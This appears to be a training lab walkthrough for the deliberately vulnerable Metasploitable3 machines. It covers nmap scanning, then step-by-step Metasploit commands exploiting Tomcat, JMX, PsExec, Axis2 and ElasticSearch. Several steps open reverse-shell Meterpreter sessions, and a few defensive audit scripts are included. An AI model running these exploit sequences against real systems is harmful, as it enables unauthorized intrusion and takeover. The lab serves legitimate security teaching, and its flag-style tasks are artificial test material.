Metasploitable3 Exploitation Lab

easy 8 tasks 1 hour
A Journey into Ethical Hacking and Vulnerability Discovery
Welcome to the Metasploitable3 lab! This virtual machine is purposely designed with known vulnerabilities for you to exploit and learn in a safe environment.

Discover the network with nmap

1 Points

Welcome to the Metasploitable3 Lab

Welcome to the Metasploitable3 lab! Within this environment, you'll find two vulnerable machines, Windows 2008 and Linux, both purposefully designed with vulnerabilities for you to discover, exploit, and learn.

In this lab, we'll start with the Windows 2008 machine, guiding you through its vulnerabilities. Afterward, you'll have the opportunity to challenge yourself with the Linux machine on your own. Make sure to refer to the Vulnerabilities Wiki for a comprehensive list of known vulnerabilities and to the Credentials Wiki for the list of credentials you might need.

Kali => 203.0.113.9/24

Ubuntu 14.04 => 192.168.1.4/24

Windows 2008 machine => 192.168.1.5/24

💡 Note: You have direct access to all machines in this lab.
Feel free to explore, troubleshoot, and fix issues as you go.

Happy hacking!

Let's start by familiarizing ourselves with the target network through a progressive series of nmap scans against the Metasploitable3 machines.

1. Quick Ping Sweep

Before diving deeper, identify which hosts are alive in the network.

nmap -sn 192.168.1.4-5

2. Fast Scan

Conduct a quick scan of the most common ports. This will give you a quick overview without delving too deeply:

nmap -F 192.168.1.4-5

3. Service Version Detection

Identify the services running on the open ports. This will be crucial when considering potential exploits:

nmap -sV 192.168.1.4-5

4. Standard OS Detection Scan

Try to determine the operating system of the target machines:

nmap -O 192.168.1.4-5

5. Aggressive OS Detection Scan

This makes nmap guess the operating system more aggressively. When nmap is unsure about the OS, it will usually provide several possible matches:

nmap -O --osscan-guess 192.168.1.4-5

6. Full Scan with Scripting

This is a more aggressive scan that covers the most common ports (-F) and, through -A, gathers version details, runs the default scripts, and tries to determine the operating system.

Be aware this scan will take more time than the previous scans:

nmap -F -T4 -A 192.168.1.4-5

To scan all ports (-p-) instead of only the most common ones:

nmap -p- -T4 -A 192.168.1.4-5

As you go through these scans, take note of the open ports, services, and any other interesting details. These insights will be crucial for the next steps in your penetration testing journey.
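One way to keep those notes in a reviewable form is to save the scan in nmap's grepable format (`-oG`) and tabulate it. The following is an added example, not part of the original lab: the sample output is constructed (its ports and banners are illustrative, not captured from the lab machines) and the `EXPECTED` baseline is a hypothetical allow-list.

```python
# Constructed sample of `nmap -sV -oG -` output for the two lab targets.
SAMPLE_GNMAP = """\
# Nmap scan initiated as: nmap -sV -oG - 192.168.1.4-5
Host: 192.168.1.4 ()\tStatus: Up
Host: 192.168.1.4 ()\tPorts: 22/open/tcp//ssh//OpenSSH 6.6.1p1/, 80/open/tcp//http//Apache httpd 2.4.7/, 631/closed/tcp//ipp///\tIgnored State: filtered (97)
Host: 192.168.1.5 ()\tStatus: Up
Host: 192.168.1.5 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.1/, 8282/open/tcp//http//Apache Tomcat|Coyote JSP engine 1.1/, 9200/open/tcp//wap-wsp?///\tIgnored State: closed (97)
# Nmap done
"""

# Hypothetical baseline of services each host is supposed to expose.
EXPECTED = {
    "192.168.1.4": {(22, "tcp"), (80, "tcp")},
    "192.168.1.5": {(22, "tcp")},
}


def parse_gnmap(text):
    """Return {host: [(port, proto, service, version), ...]} for open ports."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host: ") or "\tPorts: " not in line:
            continue  # comments and "Status:" lines carry no port data
        host = line.split()[1]
        ports_field = line.split("\tPorts: ", 1)[1].split("\t", 1)[0]
        for entry in ports_field.split(", "):
            # Entry layout: port/state/proto/owner/service/rpcinfo/version/
            fields = entry.strip().split("/")
            if len(fields) < 7 or fields[1] != "open":
                continue
            port, _, proto, _, service, _, version = fields[:7]
            # nmap writes "/" inside a version string as "|"
            hosts.setdefault(host, []).append(
                (int(port), proto, service, version.replace("|", "/")))
    return hosts


def unexpected_ports(hosts, allowed):
    """Return {host: [port, ...]} for open ports missing from the baseline."""
    report = {}
    for host, services in hosts.items():
        extra = [port for port, proto, _, _ in services
                 if (port, proto) not in allowed.get(host, set())]
        if extra:
            report[host] = extra
    return report


if __name__ == "__main__":
    print(unexpected_ports(parse_gnmap(SAMPLE_GNMAP), EXPECTED))
```
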

Keep up the good work!

Click Complete once you finish the task.

Exploiting Apache Tomcat

1 Points

Let's start our first hack by exploiting the Apache Tomcat vulnerabilities (CVE-2009-3843, CVE-2009-4189) on the target machine using Metasploit. Successfully exploiting these vulnerabilities will allow unauthorized control over the system.

Task:

Extract the Tomcat version. Answer Format: 8.x.xx

Answer:

To complete this task, follow these steps:

1. Open Metasploit

   Initiate the Metasploit console by typing msfconsole in your terminal.

2. Choose the appropriate exploit

   For this task, we will use the tomcat_mgr_upload exploit. To do so, input the following command in the Metasploit console:

use exploit/multi/http/tomcat_mgr_upload

3. Set the target host & port

   The target of your attack is the remote host. Set the IP address and port of the remote host with these commands:

set RHOSTS 192.168.1.5
set RPORT 8282

4. Set the credentials and target URI

set HttpUsername sploit
set HttpPassword sploit
set TARGETURI /manager

5. Launch the exploit

   Now, you can run the exploit using the following simple command:

run

By completing these steps, you will successfully exploit the Apache Tomcat vulnerabilities on the target machine.
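The steps above work because a manager account is protected only by a guessable password. Seen from the defender's side, the same weakness can be found by auditing `tomcat-users.xml`. This is an added example, not part of the original lab; the sample file is constructed (only the `sploit` account mirrors the credentials above), passwords are assumed to be stored in plaintext, and the password list and length policy are illustrative assumptions.

```python
import xml.etree.ElementTree as ET

# Constructed tomcat-users.xml; "sploit" mirrors the lab credentials above,
# the other accounts are invented for the example.
SAMPLE_USERS_XML = """\
<tomcat-users xmlns="http://tomcat.apache.org/xml">
  <role rolename="manager-gui"/>
  <user username="sploit" password="sploit" roles="manager-gui"/>
  <user username="admin" password="tomcat" roles="manager-gui, manager-script"/>
  <user username="deploy" password="Zr8!kq2#Lm0vTq" roles="manager-script"/>
  <user username="monitor" password="monitor" roles="manager-status"/>
</tomcat-users>
"""

# Manager roles that permit deploying web applications.
DEPLOY_ROLES = {"manager-gui", "manager-script"}
# Short illustrative list, not a complete dictionary.
COMMON_PASSWORDS = {"tomcat", "admin", "password", "manager", "s3cret", "changeit"}
MIN_LENGTH = 12  # assumed local policy


def weakness(username, password):
    """Return a reason string if the password is weak, else None."""
    if password.lower() == username.lower():
        return "password equals username"
    if password.lower() in COMMON_PASSWORDS:
        return "common default password"
    if len(password) < MIN_LENGTH:
        return f"shorter than {MIN_LENGTH} characters"
    return None


def audit_tomcat_users(xml_text):
    """List (username, deploy_roles, reason) for weak accounts that can deploy."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        # The file may declare a default XML namespace; compare local names only.
        if el.tag.rsplit("}", 1)[-1] != "user":
            continue
        roles = {r.strip() for r in el.get("roles", "").split(",")}
        deploy = sorted(roles & DEPLOY_ROLES)
        reason = weakness(el.get("username", ""), el.get("password", ""))
        if deploy and reason:
            findings.append((el.get("username"), deploy, reason))
    return findings


if __name__ == "__main__":
    for finding in audit_tomcat_users(SAMPLE_USERS_XML):
        print(finding)
```
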

Keep up the good work!

Full Match Answer:

Exploiting Java JMX Server

1 Points

This task requires you to exploit a vulnerable Java JMX (Java Management Extensions) server. The objective is to gain unauthorized access to the system.

Task:

Extract the value of the file C:\Program Files\jmx\flag.txt

Answer:

1. Launch the Metasploit console with msfconsole.

2. Use the following sequence of commands:

use exploit/multi/misc/java_jmx_server
set RHOSTS 192.168.1.5
set RPORT 1617
run

This sequence of steps will guide you to successfully exploit the Java JMX server on the target system.

Keep up the good work!

Full Match Answer:

Exploiting Windows with PsExec

1 Points

In this task, use Metasploit to exploit a Windows system vulnerability via the PsExec service. This exploit can lead to system-level control over the target.

Task:

Extract the value of the file c:\flag.txt

Answer:

1. Launch the Metasploit console with msfconsole.

2. Use the following sequence of commands:

use exploit/windows/smb/psexec
set RHOSTS 192.168.1.5
set SMBUser vagrant
set SMBPass vagrant
set LHOST 10.0.1.5
run

In this example, we're assuming that you have valid credentials (vagrant:vagrant) for the target system.

Keep up the good work!

Full Match Answer:

Enumerating SNMP

1 Points

Your goal in this task is to use the Simple Network Management Protocol (SNMP) to enumerate information about the target system using Metasploit. Successfully performing this operation can reveal useful information about the target, which could potentially aid in exploiting other vulnerabilities.

Task:

Extract the sshd.exe service path. Answer Format: C:\Program Files\xxxxxxx\xxx\xxxx\

Answer:

1. Launch the Metasploit console with msfconsole.

2. Use the following sequence of commands:

use auxiliary/scanner/snmp/snmp_enum
set RHOSTS 192.168.1.5
set COMMUNITY public
run

Keep in mind, enumeration should be conducted ethically and only on systems where you have been given explicit permission.

Keep up the good work!

Full Match Answer:

Exploit Apache Axis2

1 Points

Your task is to exploit a vulnerability in Apache Axis2, specifically CVE-2010-0219, using Metasploit. This vulnerability could allow you to deploy a malicious web service on the target system and gain control over it.

Task:

Extract the Tomcat version. Answer Format: 8.x.xx

Answer:

1. Launch the Metasploit console with msfconsole.

2. Use the following sequence of commands:

use exploit/multi/http/axis2_deployer
set RHOSTS 192.168.1.5
set RPORT 8282
set payload java/meterpreter/reverse_tcp
set LHOST 10.0.1.5
set LPORT 4444
exploit

These commands will exploit the Axis2 vulnerability and establish a Meterpreter session with the target system if successful.

Please continue your ethical hacking journey with respect and integrity. Exploit systems only where you have explicit permission to do so.

Keep up the good work!

Full Match Answer:

Exploit ElasticSearch

1 Points

In this task, you are to exploit a vulnerability in ElasticSearch, specifically CVE-2014-3120, using Metasploit. This vulnerability could allow you to execute arbitrary code remotely on the target system, effectively gaining control over it.

Task:

Extract the ElasticSearch version. Answer Format: 1.x.x

Answer:

1. Launch the Metasploit console with msfconsole.

2. Use the following sequence of commands:

use exploit/multi/elasticsearch/script_mvel_rce
set RHOSTS 192.168.1.5
set RPORT 9200
set payload java/meterpreter/reverse_tcp
set LHOST 10.0.1.5
set LPORT 4444
exploit

These commands will exploit the ElasticSearch vulnerability and establish a Meterpreter session with the target system if successful.

Exploit systems only with explicit permission.
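CVE-2014-3120 exists because Elasticsearch releases before 1.2 enable dynamic scripting by default; setting `script.disable_dynamic: true` in `elasticsearch.yml` turns it off. The check below is an added example, not part of the original lab: it flattens a simple `elasticsearch.yml` (flat or nested keys) and reports whether a node with a given version is exposed. The version strings and config samples are constructed.

```python
# Constructed configuration samples.
ES_YML_DEFAULT = """\
cluster.name: lab          # constructed sample
network.host: 0.0.0.0
"""
ES_YML_HARDENED = """\
cluster.name: lab
script:
  disable_dynamic: true
"""


def parse_flat_yaml(text):
    """Flatten simple 'key: value' YAML into dotted keys (no lists or anchors)."""
    settings, stack = {}, []  # stack holds (indent, key) of open parent mappings
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].rstrip()
        if not line.strip() or ":" not in line:
            continue
        indent = len(line) - len(line.lstrip())
        key, _, value = line.strip().partition(":")
        # Leave parent mappings that are not less indented than this line.
        while stack and stack[-1][0] >= indent:
            stack.pop()
        if value.strip():
            path = ".".join([k for _, k in stack] + [key.strip()])
            settings[path] = value.strip().strip("'\"")
        else:
            stack.append((indent, key.strip()))
    return settings


def dynamic_scripting_exposed(version, config_text):
    """True if dynamic scripting is on: explicitly, or by the pre-1.2 default."""
    explicit = parse_flat_yaml(config_text).get("script.disable_dynamic", "").lower()
    if explicit == "true":
        return False
    if explicit == "false":
        return True
    # No explicit true/false: fall back to the release default.
    major, minor = (int(part) for part in version.split(".")[:2])
    return (major, minor) < (1, 2)


if __name__ == "__main__":
    print(dynamic_scripting_exposed("1.0.0", ES_YML_DEFAULT))
    print(dynamic_scripting_exposed("1.0.0", ES_YML_HARDENED))
```
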

Keep up the great work!

Full Match Answer: